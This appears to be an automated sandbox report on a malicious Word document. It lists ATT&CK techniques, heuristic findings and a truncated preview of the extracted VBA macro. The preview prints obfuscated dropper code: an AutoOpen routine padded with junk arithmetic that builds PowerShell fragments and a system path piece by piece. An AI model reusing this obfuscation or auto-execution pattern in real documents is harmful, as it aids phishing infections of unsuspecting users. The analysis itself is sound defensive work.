MALICIOUS
170
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an Office document containing a VBA macro with an AutoOpen subroutine. The macro utilizes a CreateObject call, a common technique for executing malicious code or downloading additional payloads. The obfuscated nature of the script prevents a more detailed analysis of its specific actions, but the presence of AutoOpen and CreateObject strongly suggests a downloader or dropper functionality.
Heuristics 7
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 187257 bytes |
SHA-256: 79a44341aa5e3d7c0acf511695ba9f32d67d60e44e7205bfabd9573c5ceb2ce9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Function ufvrkvv(ovii)
ntuhzhydqhfz = -41 * 31
End Function
Function clwiu79()
nzeugie = -40 / 10
uiyarnu = -72 * 156
nxsao = -152 / 121
End Function
Function eyuypm(gpgwtixs)
pzulwuxxvj = -107 * 17
azaamteue = -174 / 2
eoide = -149 * 93
qdeiei = -37 * 86
End Function
Function cpxbm(flsfdoa30, vsdu03)
untyyddey = -37 + 155
End Function
Function agyeo(ndhy, yoyfk, vxayo)
eaiec = -71 - 122
zwyzkwcthbhw = -22 - 158
End Function
Function fraqflvn()
uuuvxua1 = -13 / 136
End Function
Function yvikpcha0()
pyegbqu = -81 + 63
End Function
Function wzyxfdao(xmaauy, eoddopu)
ozontijpl = -92 / 92
ukaoiyo = -72 - 180
End Function
Function ykwra6(aikcjshxg, avfak8, ksltrsb08)
gueufcu = -26 / 100
End Function
Function odbol()
oureekw39 = -55 / 87
End Function
Function vvqorlk(oulkl, tqixca)
ejbsya = -131 + 175
tjifgk2 = -130 / 34
uikpgesfyy = -42 - 161
End Function
Function zfogzsnq(gljdugxt, nflau, ekged9)
oeywmnyu = -106 * 129
xkakzig = -118 + 128
End Function
Sub AutoOpen()
teyusr = -92 / 179
aigaao = -120 / 145
jlvxpoe = "$nhaagkq"
uauui04 = -7 - 46
mauimx = -34 - 121
ohtbca = "te"
xqsevva1 = "mp"
xiouyyvb = -91 - 141
iwzlfww = -174 * 146
akuu = -101 - 98
iuzwmhmg = ohtbca & xqsevva1
upfeivkye = -71 - 143
pvfjwk = "ohchqpef"
kiirbvsbqsv = -43 * 79
loya = -82 * 164
pyiacce = "gheaicx+$iqaowaoen"
xqeoeo = -56 - 7
qcaye = -169 + 166
howlvkln0 = "zywqiabtlhlpi+"
ekpoo = -171 * 38
Dim rhfjreuhd As String
rhfjreuhd = -152 + 128
kflehpcepgc = -111 * 112
feuye = "$gevaiiaog"
nbaiy1 = -127 * 172
mscxsy = -117 * 15
wuqwyb = -43 / 176
xpjrcgg32 = "guuienz+$sfu"
cukrawvv = -80 - 109
xzaou = "stisbugxy"
fxfnmreo10 = Environ("SystemRoot")
ygneouodho00 = -178 / 157
nbbgkhlzx = -173 - 147
yoauey = -55 / 92
eoenvxu44 = -59 - 92
dlatlrefvapl = -124 / 38
ebzuxkl = "xboahzyrhim"
iaudvbldpt51 = -18 - 160
cfpfamx = "ya+$audg"
eiackncjvd = -50 / 148
eeaodmeb = -80 * 144
qqabshq = jlvxpoe & pvfjwk & pyiacce & howlvkln0 & feuye & xpjrcgg32 & xzaou & ebzuxkl & cfpfamx
auipw8 = -96 * 52
zjzcvxgru = -171 * 177
whufbqvpv = -100 / 113
mqwli47 = -87 * 68
tdbvooe = -14 + 38
Dim giogqv, uyddyazkqo, hwyagxx, kkiso1 As Integer
giogqv = -146 - 50
qkndjdil = -62 / 62
azzketi = "t';$eqkdsgfwuau"
ukdahpsd1 = -90 / 39
yyilbfshzj = -76 - 99
ocnpsddtee = -64 + 156
eemtjo = fxfnmreo10
auyya = -132 + 31
kuoa = -124 * 2
eemtjo = eemtjo + "\sys"
bscroxuvvb = -9 - 138
iaykhya = -17 / 33
Dim kaobwv As Integer
kaobwv = -151 - 100
neee = "subwhfw=' ''\gv"
uiosjri = -165 * 75
fdutjctl = -47 + 178
gjtakb = "fs';$omiyoaqrtauqjwhmooitlu='v"
puoaka = -153 / 155
ukvyeyy = -14 + 171
aijnoaopgcb = -142 - 172
dlxhaio = ":tem';$ggpsidleyetsojuyizjzku="
rzqiu = -178 + 139
ooyrwpbo = -106 + 34
oapz = -147 * 151
gmiitcta = eemtjo
mwjiu8 = -170 + 1
ruufqk = -108 * 118
wlzlxcg = "tem32\"
omdtzqumxey = -148 / 58
yykplckcgvj = -120 * 46
gmiitcta = gmiitcta + wlzlxcg
kwybmiktc = -18 + 77
ongoxayc = -129 - 92
dqoyoo00 = -168 * 23
fmsyhmse = -83 + 14
eibrbxkvp = -83 - 155
ulzfmofj = "'book"
juadyoli09 = -138 / 113
gksci = "skee';$iqaowaoe"
jndnzoau = -117 + 35
Dim aaoyae As Integer
aaoyae = -38 + 111
aoeetd = "nzywqiabtlhl"
uphnze31 = -117 / 105
uevunx12 = azzketi & neee & gjtakb & dlxhaio & ulzfmofj & gksci & aoeetd
Dim hajvvq64 As Integer
hajvvq64 = -16 / 172
amfoevtvgtq = -91 + 163
xhenjslqmdva70 = -39 / 91
crjof = "Windo"
hhpyy = -22 - 143
rplkhrxfhap = -32 + 29
iyyoueaj = -154 - 86
gmiitcta = gmiitcta + crjof
oyliipnrx = -104 * 16
uuxraueapr = -138 + 105
mlgiagzngtp = -98 - 8
oylo = -57 * 134
uuwbbvoko = -7 + 3
ubkuyp = -127 / 81
stmcyae37 = -163 * 36
ugyrn = "hqlitooo"
Dim jbuutu As String
jbuutu = -174 + 97
eomkqoa = -7 + 1
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.